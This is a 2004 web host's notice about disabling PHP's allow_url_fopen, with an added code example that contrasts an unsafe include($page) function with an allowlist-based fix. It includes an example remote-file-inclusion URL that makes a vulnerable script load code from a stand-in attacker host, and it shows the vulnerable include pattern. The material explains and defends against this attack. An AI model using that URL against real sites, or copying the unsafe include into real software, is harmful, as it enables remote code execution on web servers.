PHP Configuration Change
updated July 7, 2004
We will be making a change to our default PHP configuration starting on
July 1, 2004. This change will not remove any functionality, but will turn
off by default a feature that is infrequently used but the focus of many
attacks.
PHP has the ability to read pages given as URLs for use within PHP code.
For instance, the PHP code:
<?php include("http://www.example.com/script.php"); ?>
can be used to download and include the code at that URL. When used as
intended, this can be very convenient.
However, when combined with code that uses a variable in an include()
statement without validating its contents, it can be exploited by a
malicious user to run arbitrary code.
Imagine a page that uses this code:
<?php include($page); ?>
which is called in this manner:
http://example.com/script.php?page=http://attack.example.com/badscript.php
Without proper input checking, the remote script will be included and
executed, running whatever commands the attacker chooses as the web server
user.
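The following is an added example, not code from the original pair Networks notice: it places the unsafe include() pattern described above next to a hardened form that treats the request parameter as a lookup key into a fixed list of local files, so the parameter can never name a URL or an arbitrary path. The page names, the pages/ directory and the function names are constructed for illustration, and the code is written for PHP 7 or later rather than the PHP 4 of the notice.

```php
<?php
// Added example (not from the original pair Networks notice).
// Page keys, file paths and function names are constructed for illustration.

// Unsafe pattern from the notice: the request directly controls the include
// path. With allow_url_fopen on, ?page=http://... fetches and executes remote
// code as the web server user; even with it off, the parameter still selects
// any readable local file.
function include_page_unsafe()
{
    $page = isset($_GET['page']) ? $_GET['page'] : 'home';
    include($page);
}

// Hardened pattern: the parameter is only a key into an allowlist of local
// files, so neither a URL nor a path the application did not define can be
// included. Unknown keys fall back to a local default instead of being
// interpreted as a filename.
function include_page_safe()
{
    $pages = array(
        'home'    => __DIR__ . '/pages/home.php',
        'about'   => __DIR__ . '/pages/about.php',
        'contact' => __DIR__ . '/pages/contact.php',
    );
    $key = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
    if (!array_key_exists($key, $pages)) {
        http_response_code(404);
        $key = 'home';
    }
    include($pages[$key]);
}

// Reports whether the setting the notice is about is enabled for this
// script, which is the quickest way to confirm the server-side default (or a
// per-account .htaccess override) took effect.
function url_fopen_enabled()
{
    return filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
}

include_page_safe();
```

The allowlist approach is what removes the dependence on the server setting: with include_page_safe() in place, the application behaves the same whether allow_url_fopen is on or off, and url_fopen_enabled() lets an account owner verify the current value after editing .htaccess.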
Thousands of our customers are using PHP software packages (both open-source
and commercial) which do not perform proper input checking. As a result, we
see 5-10 successful attacks each week exploiting these vulnerabilities.
For this reason, we will be changing our configuration to disallow loading
of URLs via include(), require(), file(), and similar routines. The majority
of our users are not actively using this feature, and need do nothing at all.
If you are taking advantage of this feature, you can turn it on for your
account by adding the following configuration line to your .htaccess file:
php_flag allow_url_fopen on
UPDATE: If you are using php4.cgi in conjunction with php-cgiwrap, a different change
is required. You should copy /usr/local/etc/php.ini to the same directory
as your copy of php4.cgi, and remove the line that references allow_url_fopen
from the file entirely.
Please note that this only affects attempts to load URLs via these functions.
It has no effect on loading files from the server itself.
We will be making this change in batches of servers, to better support any
user who experiences problems, in accordance with the following schedule:
Mon July 5, 2004: www1 - www100
Tue July 6, 2004: www101 - www200
Wed July 7, 2004: www201 - www300
Thu July 8, 2004: www301 - www370 & Quickserves
pair Networks appreciates your business! We are striving to provide the best possible Web hosting.